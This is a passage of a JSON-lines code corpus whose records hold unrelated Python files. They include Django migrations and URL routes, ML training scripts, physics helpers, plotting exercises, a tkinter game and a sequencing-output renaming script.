plt\r\nplt.imshow(img)\r\nplt.title('{}({}kcal)'.format(name,cal))\r\nplt.axis('off')\r\nplt.show()\r\n\r\n\r\n\r\n","sub_path":"CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"71728767","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pedido', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='MultaCarregamento',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('vl_multa', models.DecimalField(null=b'true', verbose_name=b'Valor da multa (R$)', max_digits=17, decimal_places=2, blank=b'true')),\n ('carregamento', models.ForeignKey(related_name='carregamento_multa', blank=b'true', to='pedido.Carregamento', null=b'true')),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='MultaItem',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('vl_multa', models.DecimalField(null=b'true', verbose_name=b'Valor da multa (R$)', max_digits=17, decimal_places=2, blank=b'true')),\n ('item', models.ForeignKey(related_name='item_multa', blank=b'true', to='pedido.Item', null=b'true')),\n ],\n options={\n 'abstract': False,\n },\n ),\n ]\n","sub_path":"multa/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"651744376","text":"from MEMM2 import MEMM\nimport pickle\nimport time\n\n# %%\ntrain_file = 'train2_expanded.wtag'\npredict_file = 'train1.wtag'\nmemm = MEMM(lamda=1,threshold=1)\n\n\n# weights_path = 'train1_weights.pkl'\n# with open(weights_path, 'rb') as f:\n# optimal_params = pickle.load(f)\n# pre_trained_weights = optimal_params\n# memm.assign_weights(pre_trained_weights)\n\nstart = time.time()\nmemm.fit(train_file)\nend = time.time()\nprint('time=', (end - start) / 60)\n\n\nweights_path = 'train2_final.pkl'\nwith open(weights_path, 'wb') as f:\n pickle.dump(memm.v, f)\n\n# start = time.time()\n# memm.predict(predict_file,hide_tags=True,beam_width=2)\n# end = time.time()\n# print('time=', (end - start) / 
60)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"489448816","text":"import re\nimport numpy as np\nfrom decimal import Decimal, ROUND_HALF_UP\nimport string\nimport os\n\nfrom pint import UnitRegistry, Quantity, Unit, errors\n\nureg = UnitRegistry()\nureg.load_definitions(os.path.expanduser('~/pyimports/udef.txt'))\n\nkg = ureg.kg\ngm = ureg.g\nN = ureg.N\ns = ureg.s\nJ = ureg.J\nm = ureg.m\nmeters = ureg.m\nrad = ureg.rad\n\ndef Q_(quantity, unit=None):\n if unit is not None:\n return ureg.Quantity(quantity).to(unit)\n return ureg.Quantity(quantity)\n\ndef Qs(quantities, unit=None):\n res = []\n\n for quantity in quantities.split(' '):\n if unit is not None:\n res.append(Q_(quantity).to(unit))\n else:\n res.append(Q_(quantity))\n\n return res\n\ndef proper_round(x, n=0):\n try:\n exp = str(1/10**n if n != 0 else 1)\n\n return Decimal(str(x)).quantize(Decimal(exp), rounding=ROUND_HALF_UP)\n except Exception:\n return round(x, n)\n\ndef to_sig(x, n=3, display=False):\n if x == 0:\n return '0'\n\n signed_x = x\n x = abs(x)\n\n int_length = len(str(int(x))) if str(int(x)) != '0' else 0\n round_length = len(str(int(proper_round(x))))\n\n if 0 < int_length <= n and round_length <= n:\n res = str(float(proper_round(x, n - int_length)))\n\n if len(res.replace('.', '')) < n:\n res = res.ljust(n + 1, '0')\n elif len(res.replace('.', '')) > n:\n res = str(int(float(res)))\n else:\n res = re.sub(r'0(\\d)$', r'\\1', ('{:.' + str(n - 1) + 'e}').format(x))\n res = res.replace('+', '')\n res = re.sub('e0$', '', res)\n\n res = res if signed_x >= 0 else f'-{res}'\n\n if display:\n sci_notation_components = res.split('e')\n\n if len(sci_notation_components) > 1:\n coefficient, exponent = sci_notation_components\n\n subs = [\n '- ⁻',\n '0 ⁰',\n '1 ¹',\n '2 ²',\n '3 ³',\n '4 ⁴',\n '5 ⁵',\n '6 ⁶',\n '7 ⁷',\n '8 ⁸',\n '9 ⁹',\n ]\n\n for sub in subs:\n x, y = sub.split(' ')\n\n exponent = exponent.replace(x, y)\n\n return '{} × 10{}'.format(coefficient, exponent)\n\n return res\n\ndef format_answer(answer, compare=False, no_rounding=False, suggest_unit=None, display=False):\n unit = suggest_unit\n n_figures = 3\n\n if isinstance(answer, tuple):\n try:\n n_figures = next(x for x in answer if isinstance(x, int) and not isinstance(x, bool))\n except StopIteration:\n pass\n\n try:\n unit = next(x for x in answer if isinstance(x, (Unit, str)))\n except StopIteration:\n pass\n\n try:\n is_abs = next(x for x in answer if isinstance(x, bool))\n except StopIteration:\n is_abs = False\n\n answer, *_ = answer\n answer = abs(answer) if is_abs else answer\n\n if isinstance(answer, Quantity):\n if unit is not None:\n try:\n answer.ito(unit)\n except errors.DimensionalityError:\n answer.ito_base_units()\n else:\n answer.ito_base_units()\n\n res = []\n if no_rounding:\n res.append(answer.magnitude)\n else:\n res.append(to_sig(answer.magnitude, n_figures, display))\n\n if compare:\n res.append(answer.magnitude)\n\n unit_display = '{:~P}'.format(answer.units)\n\n if display:\n res[0] += ' ' + unit_display\n else:\n res.append(unit_display)\n\n return res\n\n if isinstance(answer, (float, int, np.int64, np.float64)):\n res = []\n\n if no_rounding:\n res.append(answer)\n else:\n res.append(to_sig(answer, n_figures, display))\n\n if compare:\n res.append(answer)\n\n return res\n\n return str(answer),\n\ndef format_answers(*answers, compare=False, no_rounding=False, suggest_unit=None, 
display=False):\n if len(answers) == 0:\n return\n\n if isinstance(answers[0], list):\n answers = answers[0]\n\n res = []\n\n display_letter = True\n\n for i, answer in enumerate(answers):\n formatted_answer = []\n\n if answer is None:\n display_letter = False\n\n continue\n elif display_letter:\n formatted_answer.append(string.ascii_lowercase[i])\n else:\n formatted_answer.append('')\n\n formatted_answer += format_answer(answer, compare, no_rounding, suggest_unit, display)\n\n res.append(formatted_answer)\n\n return res\n\ndef print_answer(*args, **kwargs):\n if not 'display' in kwargs:\n kwargs['display'] = True\n\n print(format_answer(*args, **kwargs)[0])\n\ndef mag(*values):\n if isinstance(values[0], (list, tuple)):\n values = values[0]\n\n if len(values) > 1:\n return [v.magnitude for v in values]\n else:\n return values[0].magnitude\n\ng = 9.80 *m/s**2\nG = 6.674e-11 *N*m**2/kg**2\n\nπ = np.pi\n","sub_path":"files/pyimports/physics.py","file_name":"physics.py","file_ext":"py","file_size_in_byte":5066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"487544325","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom sklearn.externals import joblib\n\n#from sentiment_vader import Vader\nfrom text_sentiment import TextSentiment\nfrom comment_sentiment import CommentSentiment, TopicSentiment\n\nABS_PATH = os.path.dirname(os.path.abspath(__file__))\nMODEL_FPATH = os.path.join(ABS_PATH, 'comment_sentiment.model')\nMODEL_FPATH_B = os.path.join(ABS_PATH, 'article_sentiment.model')\n\ndef load_CS_classifier(force=False):\n if not os.path.exists(MODEL_FPATH):\n if force:\n train_CS_classifier()\n else:\n raise OSError('The classifier persistence file does not exist, please train first.')\n return joblib.load(MODEL_FPATH)\n\ndef train_CS_classifier(load_extra=False):\n clf = CommentSentiment()\n clf.load_train_data()\n if load_extra:\n clf.load_extra_data()\n clf.train(clf.train_data.data, clf.train_data.target)\n joblib.dump(clf, MODEL_FPATH)\n\ndef load_TS_classifier(force=False):\n if not os.path.exists(MODEL_FPATH_B):\n if force:\n train_TS_classifier()\n else:\n raise OSError('The classifier persistence file does not exist, please train first.')\n return joblib.load(MODEL_FPATH_B)\n\ndef train_TS_classifier(load_extra=False):\n clf = TopicSentiment()\n clf.load_train_data()\n if load_extra:\n clf.load_extra_data()\n clf.train(clf.train_data.data, clf.train_data.target)\n joblib.dump(clf, MODEL_FPATH_B)\n","sub_path":"my_nlp/sentiment/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"626662195","text":"# -*- coding:utf-8 -*-\n\nimport map_reduce\n\ndef map_function(data):\n\tfor d in data:\n\t\tf = d.rstrip(\"\\r\\n\").split(\"\\t\")\n\t\tif f[1] == \"3\":\n\t\t\tmap_reduce.map_output(f[0], 1)\n\t","sub_path":"8_map_reduce_stat_buy/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"349022109","text":"'''\nAuthor: \nDate: \nClass: ISTA 130\nSection Leader: \n\nDescription:\n\n'''\n\n# put all of your import statements below this line and then delete this comment\nimport sys\n# put all of your function definitions below this line and then delete this comment\n\ndef poem():\n user = input(\"What is your name?\\n\")\n print()\n print(\"Roses are red\")\n print(\"Some emeralds are 
green\")\n print(\"But I'm pretty sure that\")\n print(user, \"is the one for me\")\n#==========================================================\ndef main():\n '''\n Write a description of what happens when you run\n this file here.\n '''\n # put main code here, make sure each line is indented one level, and delete this comment\n poem()\n input('Press enter to end.') # keeps the turtle graphics window open\n\nif __name__ == '__main__':\n main()\n","sub_path":"lab/lab3/poem.py","file_name":"poem.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"103479190","text":"from __future__ import print_function\nfrom distributed.exp_server import ExperienceServer\nimport cv2, random, threading, msgpack, os\nfrom nnet.Online import Online\nfrom nnet.Metric_Visualizer import Metric_Visualizer\nfrom nnet.Trainer import Trainer\nfrom functools import partial\nimport msgpack_numpy as m\nimport numpy as np\nfrom steps import session\n\n__author__ = 'dhruv karthik '\n\ndef deserialize_obs():\n def _deser(multipart_msg):\n lidar = msgpack.loads(multipart_msg[0], encoding=\"utf-8\")\n steer = msgpack.unpackb(multipart_msg[1], encoding=\"utf-8\")\n md = msgpack.unpackb(multipart_msg[2])\n cv_img = multipart_msg[3]\n cv_img = np.frombuffer(cv_img, dtype=md[b'dtype'])\n cv_img = cv_img.reshape(md[b'shape'])\n obs_dict = {\"img\":cv_img, \"lidar\":lidar, \"steer\":steer}\n return obs_dict\n return _deser\n\n\ndef batch_callback(exp_path, obs_array):\n \"\"\"Takes the deserialized obs_array and performs simple training operations on it\"\"\"\n online_learner = Online()\n vis = Metric_Visualizer()\n pkl_name = online_learner.save_obsarray_to_pickle(obs_array, os.path.join(exp_path, 'raw'))\n vis.vid_from_pklpath(os.path.join(exp_path, 'proc', pkl_name), 0, 0, show_steer=True, units='rad', live=True)\n trainer = Trainer(online=True, pklpath=os.path.join(exp_path, 'proc', pkl_name), train_id=0)\n #Send model back\n modelpath = trainer.get_model_path()\n with open(modelpath, 'rb') as binary_file:\n model_dump = bytes(binary_file.read())\n return model_dump\n\ndef get_exp_path():\n exp_path = os.path.join(session[\"params\"][\"abs_path\"], session[\"params\"][\"sess_root\"], str(session[\"online\"][\"sess_id\"]), \"exp\")\n if not os.path.exists(exp_path):\n os.makedirs(exp_path)\n funclist = session[\"online\"][\"funclist\"]\n print(\"EXPERIENCE PATH:\", exp_path)\n return exp_path\n\nexp_path = get_exp_path()\ncb = partial(batch_callback, exp_path)\nserv = ExperienceServer(cb, deserialize_obs(), 4)\nserv.start()\nserv.join()\n","sub_path":"src/f110_gym/algorithms/simple_serv.py","file_name":"simple_serv.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"168667019","text":"# module 2 exercise: matplotlib.pyplot\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# 1. line plot\n\n# a. given these 2 data sets of totally fictitious enrollment numbers\nnumStudents41B = [0,0,1,1,1,3,5,9,12,12,12,12,10,15,16,18,20,17,17,17,18,19,20,21,21,23,23,20,22,22]\nnumStudents41A = [0,1,1,2,2,2,4,4,4,4,4,8,12,12,12,12,14,14,14,12,12,12,15,15,15,16,16,15,16,18]\n# b. create an np array for the number of days in 1 month: 1-31\ndays = np.arange(1,31)\n\n'''\n# c. 
plot the data\nplt.plot(days, numStudents41B) # which data is on the x-axis?\nplt.plot(days, numStudents41A) # which data is on the y-axis?\nplt.show()\n'''\n\n'''\n# add axis labels, legend, title to explain the graph,\n# and add new markers to show where the actual data is on the line plot\nplt.xlabel(\"days\")\nplt.ylabel(\"num of students\") # \n #\nplt.plot(days, numStudents41B, \n days, numStudents41B, 'ob', label=\"41B\")\nplt.plot(days, numStudents41A,\n days, numStudents41A, 'og', label=\"41A\")\nplt.legend(loc=\"best\") # \nplt.title(\"class registration\") # \nplt.show()\n'''\n\n'''\n# modify axes range to center the data\nplt.xlabel(\"days\")\nplt.ylabel(\"num of students\") \nplt.plot(days, numStudents41B, \n days, numStudents41B,'or',\n days, numStudents41A, \n days, numStudents41A,'ob') # \nplt.axis((-5, 35, -5, 30)) # \nplt.title(\"class registration\") # show title of graph\nplt.show()\n'''\n\n'''\n# set the x axis ticks and label them\nplt.xlabel(\"days\")\nplt.ylabel(\"num of students\")\nplt.plot(days, numStudents41B, \n days, numStudents41B, 'or', label=\"41B\")\nplt.plot(days, numStudents41A,\n days, numStudents41A, 'og', label=\"41A\") \nplt.axis((0, 30, 0, 30)) # \nplt.xticks((3,7,15), ('priority1', 'priority2', 'priority3')) # \nplt.legend(loc=\"best\") \nplt.title(\"class registration\") \nplt.show()\n'''\n\n\n\n# 2. histogram \n\n# plot frequency distribution of 20 random integers\nnumbers1 = np.random.randint(0,100, size = 20)\nnumbers2 = np.random.randint(0,100, size = 20)\nprint(sorted(numbers1))\nprint(sorted(numbers2))\n\nplt.title(\"random integers\")\nplt.xlabel(\"values\")\nplt.ylabel(\"frequency\")\n\n\n\n'''\n# basic plotting of numbers1\nplt.hist(numbers1, bins=20, color=\"orange\")\n'''\n\n'''\n# show the bins more clearly for numbers1\nplt.xticks(np.arange(0,101,5))\nplt.hist(numbers1, bins=20, color=\"orange\")\nplt.axis((0,100, 0, 4))\n'''\n\n\n# plotting both numbers1 and numbers2\nplt.hist(numbers1, bins=20, color=\"blue\", label=\"numbers1\", alpha = .5)\nplt.hist(numbers2, bins=20, color=\"red\", label=\"numbers2\", alpha = .5)\nplt.legend(loc=\"best\")\n\n\n'''\n# another way of plotting numbers1 and numbers2\nplt.hist((numbers1, numbers2), color=(\"blue\", \"red\"), label=(\"numbers1\",\"numbers2\"), alpha=0.5, bins=10)\nplt.legend(loc=\"best\")\n'''\nplt.show()\n","sub_path":"Module 2/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"71351372","text":"import tkinter as tk\nfrom random import randint\nfrom tkinter import messagebox\n\nroot = tk.Tk()\nroot.geometry('1000x800')\nroot.title('Mini-game')\nroot.resizable(0, 0)\n\n\n\ndef hand(event, ball):\n global count\n global t\n global score\n if count >= 10 and t < 1000:\n count = 0\n t += 1000\n if (event.x < ball.x + ball.r and event.x > ball.x - ball.r and event.y < ball.y + ball.r and event.y > ball.y - ball.r) :\n area.delete(ball.id_ball)\n balls.remove(ball)\n count +=1\n score += 1\n lbl.configure(text = str(score))\n\nclass Ball:\n global area\n id_ball, x, y, r, dx, dy = 0, 0, 0, 0, 0, 0\n def __init__(self):\n self.r = randint(25, 100)\n self.x = randint(1 + self.r, 1000 - self.r)\n self.y = randint(1 + self.r, 800 - self.r)\n self.dx = 5\n self.dy = 5\n self.id_ball = 0\n area.bind('', lambda event, b = self: hand(event, b))\n \n def show_on_canvas(self):\n self.id_ball = area.create_oval(self.x - self.r, self.y - self.r, self.x + self.r, self.y + self.r, 
fill = 'orchid3', outline = 'black')\n\n\n\n\ndef tick():\n global balls\n global area\n global t\n global score\n\n if score < -50:\n ans = messagebox.askyesno(\"You lose\", \"Restart?\")\n if ans == False:\n exit()\n else:\n score = 0\n t = 2000\n area.delete(balls[0].id_ball)\n balls = []\n \n if score >= 100:\n ans = messagebox.askyesno(\"You win\", \"Restart?\")\n if ans == False:\n exit()\n else:\n score = 0\n t = 2000\n area.delete(balls[0].id_ball)\n balls = []\n\n \n\n if t > 500:\n t -= 100\n i = 0\n for x in balls:\n area.delete(x.id_ball)\n balls.remove(x)\n i += 1\n \n if i > 0:\n score -= 10\n lbl.configure(text = str(score))\n x = Ball()\n x.show_on_canvas()\n balls += [x]\n area.after(t, tick)\n\n\ndef main():\n global area\n global lbl\n global score\n score = 0\n area = tk.Canvas(root, bg = 'bisque')\n area.pack(expand = True, fill = tk.BOTH)\n \n global balls\n \n global t\n t = 2000\n\n global count\n count = 0\n \n balls = []\n\n lbl = tk.Label(root, text = '0')\n lbl.place(x = 5, y = 5)\n\n tick()\n\n root.mainloop()\n\nmain()\n","sub_path":"class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"220000453","text":"from torch.utils.data import Dataset, DataLoader\nimport pandas as pd\nimport torch\nimport numpy as np\n\n#----------------------- Custom dataset classes ----------------------\n\n\nclass My_Dataset(Dataset): # loads the UCI regression CCPP\n\n\n def split_data(self,dataset):\n train_size = int(0.8 * len(dataset))\n test_size = len(dataset) - train_size\n\n train_dataset, test_dataset = torch.utils.data.random_split(dataset, [train_size, test_size])\n train_dataset = torch.Tensor(train_dataset)\n test_dataset = torch.Tensor(test_dataset)\n return train_dataset, test_dataset\n \n def __len__(self): # len(dataset)\n return self.data[0,:].size\n def __getitem__(self, x): #dataset[i]\n return self.data[:,x]\n def get_xy(self, samples):\n x = samples[:,:self.input_dim]\n y = samples[:,self.input_dim]\n return x,y\n \n def normalize(self,data):\n\n for i in range(data[0,:].size):\n m = max(abs(data[:,i]))\n data[:,i] /= m\n return data\n \n \nclass VoltDataset(My_Dataset): # loads the UCI regression CCPP\n\n def __init__(self,normalize_bool = True): # init\n self.data = pd.read_excel('CCPP/CCPP/Folds5x2_pp.xlsx').values #('AirQualityUCI/AirQualityUCI.xlsx')\n torch.set_default_tensor_type('torch.DoubleTensor')\n #self.data = np.transpose(frame.values)\n self.input_dim = len(self.data[0]) -1 # - label\n self.output_dim = 1\n if (normalize_bool):\n self.data = self.normalize(self.data)\n self.train_data, self.test_data = self.split_data(self.data)\n\nclass AbaloneDataset(My_Dataset): # loads the UCI regression CCPP\n\n def __init__(self,normalize_bool = True): # init\n self.data = pd.read_csv('CCPP/abalone_data.csv').values #('AirQualityUCI/AirQualityUCI.xlsx')\n #Load the data from the CSV file\n males = (self.data[:,0] == 'M').astype(int)\n females = (self.data[:,0] == 'F').astype(int)\n self.data[:,0] = males - females\n\n torch.set_default_tensor_type('torch.DoubleTensor')\n self.input_dim = len(self.data[0]) -1 # - label\n self.output_dim = 1\n if (normalize_bool):\n self.data = self.normalize(self.data)\n self.train_data, self.test_data = self.split_data(self.data)\n\n\n\n\n 
\n","sub_path":"xWx_Regression/Load_Data_backup.py","file_name":"Load_Data_backup.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"423666519","text":"#!/usr/bin/env python\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on\n# an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\nimport os\nimport json\nimport argparse\nfrom beacons_bio_3d.utils import JSONUtils, DjangoUtils\n\n__doc__ = \"\"\"\n3D Beacons\n\nRegistry schema validation and utilities.\n\"\"\"\n\nRES_PATH = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'resources')\nDEFAULT_SCHEMA_JSON = f\"{RES_PATH}/schema.json\"\nDEFAULT_REGISTRY_JSON = f\"{RES_PATH}/registry.json\"\n\n\ndef main():\n \"\"\" This is the application entry point\n \"\"\"\n\n parser = argparse.ArgumentParser(\n description=__doc__, formatter_class=argparse.RawTextHelpFormatter)\n sub_parsers = parser.add_subparsers(dest='subparser_name', help=\"Available sub-commands\")\n\n # parser for validation functions\n validate_parser = sub_parsers.add_parser(\"validate_schema\", help=\"Validates the registry JSON with the defined schema.\")\n validate_parser.add_argument(\"--schema_json\", help=\"Path to the schema JSON\", required=True)\n validate_parser.add_argument(\"--registry_json\", help=\"Path to the registry JSON\", required=True)\n\n # parser for model generation functions\n model_gen_parser = sub_parsers.add_parser(\"model_generate\", help=\"Generates model JSON from registry JSON.\")\n model_gen_parser.add_argument(\"--registry_json\", help=\"Path to registry JSON to be converted\", required=True)\n model_gen_parser.add_argument(\"--model_json\", help=\"Path to output model JSON\", required=True)\n model_gen_parser.add_argument(\n \"--django_app\",\n help=\"The name of Django app, this will be used to define package for model\",\n default=\"core\")\n\n args = parser.parse_args()\n\n if args.subparser_name == \"validate_schema\":\n JSONUtils.validate_schema(args.schema_json, args.registry_json)\n elif args.subparser_name == \"model_generate\":\n if JSONUtils.validate_schema(DEFAULT_SCHEMA_JSON, args.registry_json):\n # generate model json\n gen_model = DjangoUtils.generate_fixture_json(args.registry_json, django_app=args.django_app)\n with open(args.model_json, \"w\") as model_json_handle:\n json.dump(gen_model, model_json_handle)\n\n print(f\"Model JSON generated to {args.model_json}\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"beacons_bio_3d/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"369777498","text":"#--- Marketing Tool - Imported Packages List ----\r\n\r\n#------Django Internal Packages-----\r\nfrom django.urls import include, path,re_path\r\nfrom django.contrib.auth import views as auth_views\r\n#<------Django Internal Packages-----\r\n\r\n#------ Marketing Tool Importing Project Files -----\r\n#Marketing Tool - Our 
Application Views\r\nfrom marketing_tool_lead_manager_app import views\r\n\r\n#////',views.leads_locationfrom_locationto_logintime_logouttime,name='leads_locationfrom_locationto_logintime_logouttime'),\r\n\r\n#Marketing Tool - Leads Details based on Location From, Location To, Login Time and Logout Time (Data Table)\r\npath('leads/detail/////',views.leads_locationfrom_locationto_logintime_logouttime_dt,name='leads_locationfrom_locationto_logintime_logouttime_dt'),\r\n\r\n\r\n\r\n#', views.LeadReadView.as_view(), name='read_lead'),\r\n\r\n#Marketing Tool - update url\r\npath('update/', views.LeadUpdateView.as_view(), name='update_lead'),\r\n\r\n#Marketing Tool - delete url\r\npath('delete/', views.LeadDeleteView.as_view(), name='delete_lead'),\r\n\r\n#Marketing Tool - location update\r\npath('update/location/', views.LocationUpdateView.as_view(), name='update_location'),\r\n\r\n\r\n#', views.leads_status_details.as_view(), name='leads_status_details'),\r\n\r\n\r\n#<------ Marketing Tool Zing Grid Test -----\r\n#path('lead_zing_grid_list',views.lead_zing_grid_list,name='lead_zing_grid_list'),\r\n\r\n#path('lead_zing_grid_list_mumbai',views.lead_zing_grid_list_mumbai,name='lead_zing_grid_list_mumbai'),\r\n\r\n#path('routes_zing_grid_list',views.routes_zing_grid_list,name='routes_zing_grid_list'),\t\r\n\r\n#path('leads_api/details/////', views.leads_api_Details.as_view()),\r\n\r\n\r\n\r\n#<------ Marketing Tool B2B Company Leads Urls -----\r\n\r\n#Marketing Tool - Company Leads base \r\npath(\"company_lead_base\", views.company_lead_base, name=\"company_lead_form\"),\r\n\r\n\r\n#Marketing Tool - Company Leads Form \r\npath(\"company/form\", views.company_lead_form, name=\"company_lead_form\"),\r\n\r\n#Marketing Tool - Company Leads Data\r\npath(\"company/leads\", views.company_lead_data, name=\"company_lead_data\"),\r\n\r\n#Marketing Tool - Company Leads Report \r\npath(\"company/reports\", views.company_lead_report, name=\"company_lead_report\"),\r\n\r\n#Marketing Tool - Company Leads Report \r\npath(\"company_lead_form_submit\", views.company_lead_form_submit, name=\"company_lead_form_submit\"),\r\n#\", views.view_leads, name=\"view_leads\"),\r\n\r\npath(\"add_new_lead_status/\",views.add_new_lead_status, name='add_new_lead_status'),\r\n\r\npath('updatelead/',views.updatelead.as_view(),name='updatelead'),\r\n\r\npath('deletelead/',views.deletelead.as_view(),name='deletelead'),\r\n\r\npath('update_login_time/', views.update_login_time.as_view(), name='update_login_time'),\r\n\r\npath('update_logout_time/', views.update_logout_time.as_view(), name='update_logout_time'),\r\n\r\npath('update_login_time/', views.update_login_time.as_view(), name='update_login_time'),\r\n\r\npath('delete_login_time/', views.delete_login_time.as_view(), name='delete_login_time'),\r\n\r\npath('delete_logout_time/', views.delete_logout_time.as_view(), name='delete_logout_time'),\r\n\r\npath('delete_pickup/', views.delete_pickup.as_view(), name='delete_pickup'),\r\n\r\npath('delete_drop/', views.delete_drop.as_view(), name='delete_drop'),\r\n\r\npath('Add_pickup/', views.Add_pickup.as_view(), name='Add_pickup'),\r\n\r\npath('Add_drop/', views.Add_drop.as_view(), name='Add_drop'),\r\n\r\npath('Add_login/', views.Add_login.as_view(), name='Add_login'),\r\n\r\npath('Add_logout/', views.Add_logout.as_view(), name='Add_logout'),\r\n\r\npath('Add_new_user/', views.Add_new_user.as_view(), name='Add_new_user'),\r\n\r\npath('update_user/', views.update_user.as_view(), name='update_user'),\r\n\r\npath('delete_user/', 
views.delete_user.as_view(), name='delete_user'),\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n]","sub_path":"marketing_tool_lead_manager_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":8187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"105072155","text":"#!/usr/bin/env python3\n\n\"\"\" \"Fixes\" the output of bcl2fastq to meet our requirements.\n Files are renamed, grouped by pool, and shifted out of the demultiplexing directory.\n projects_ready.txt is added listing the projects found\n projects_pending.txt is deleted if it exists\n\"\"\"\n# I guess we could go back to keeping the files in /ifs/runqc until they are renamed,\n# and this might be sensible for backup purposes. In any case I could do this with a\n# symlink so the code can stay the same.\n\nimport os, sys, re, time\nfrom glob import glob\nimport yaml\n\nfrom collections import namedtuple\nfrom contextlib import suppress\n\n# Global error collector\nERRORS = set()\n\ndef main(output_dir, prefix=None):\n \"\"\" Usage BCL2FASTQPostprocessor.py [prefix]\n \"\"\"\n output_dir = os.path.abspath(output_dir)\n\n #The prefix is normally the run name ie. the folder name, but driver.sh\n #will set this explicitly based on RunInfo.\n if not prefix:\n prefix = os.path.basename(output_dir)\n\n #All renames need to be logged. The log wants to live in the demultiplexing/\n #subdirectory.\n demux_dir = output_dir + \"/demultiplexing\"\n with open(os.path.join(demux_dir, 'renames.log'), 'a') as log_fh:\n def log(m): print(m, file=log_fh)\n log(\"# %s\" % sys.argv[0])\n log(\"# renaming files in %s on %s\" % (\n demux_dir,\n time.strftime('%Y-%m-%d %H:%M', time.localtime()) ))\n\n project_seen = do_renames(output_dir, prefix, log=log)\n\n if ERRORS:\n log(\"# There were errors...\")\n for e in ERRORS:\n print(\"Error: %s\" % e)\n log(\"# %s\" % e)\n else:\n save_projects_ready(output_dir, project_seen)\n log(\"# DONE. And projects_ready.txt was saved out.\")\n\n\ndef save_projects_ready(output_dir, proj_seen):\n \"\"\"Save out what we've processed. There might be stuff already in projects_ready.txt\n and we want to maintain the contents as a sorted set (as per 'sort -u')\n \"\"\"\n proj_ready_file = os.path.join(output_dir, 'projects_ready.txt')\n with suppress(FileNotFoundError):\n with open(proj_ready_file) as pr_fh:\n for l in pr_fh:\n proj_seen.add(l.strip())\n\n with open(proj_ready_file, 'w') as pr_fh:\n for p in sorted(proj_seen):\n # Only add projects for which there is a directory. This catches the\n # case where a incorrect project name was in the sample sheet and\n # the files have been completely flushed on re-do.\n if os.path.isdir(os.path.join(output_dir,p)):\n print(p, file=pr_fh)\n\n # And delete projects_pending.txt. 
It probably doesn't exist, which is fine.\n with suppress(FileNotFoundError):\n os.unlink(os.path.join(output_dir, 'projects_pending.txt'))\n\ndef check_project_name(proj_name):\n \"\"\" BCL2FASTQ is already quite fussy about project names.\n This will just chack that the project name isn't going to clobber any\n of our folders.\n \"\"\"\n if \".\" in proj_name:\n raise ValueError(\"Invalid project name {!r} contains a period.\".format(proj_name))\n\n if proj_name in \"counts demultiplexing md5sums multiqc_reports QC seqdata slurm_output\".split():\n raise ValueError(\"Invalid project name {!r} conflicts with reserved names.\".format(proj_name))\n\ndef do_renames(output_dir, runid, log = lambda m: print(m)):\n \"\"\" The main part of the code that does the renaming (moving).\n Primary reason for splitting this out from main() is to separate\n the sys.argv processing and the log file handling in order to\n simplify unit testing.\n Returns the list of projects for which files have been renamed.\n \"\"\"\n proj_seen = set()\n\n def add_project(proj_name):\n check_project_name(proj_name)\n proj_seen.add(proj_name)\n\n # Previously we scanned for *.fastq.gz files, but it's more sensible to look for an explicit\n # list of projects. The projects don't get listed in Stats.json, so go back to sample_summary.yml\n # directly. This allows us to proceed even when no files were produced (ie. all the barcodes are wrong)\n try:\n with open( os.path.join( output_dir, \"seqdata/pipeline\" , \"sample_summary.yml\" ) ) as sfh:\n summary = 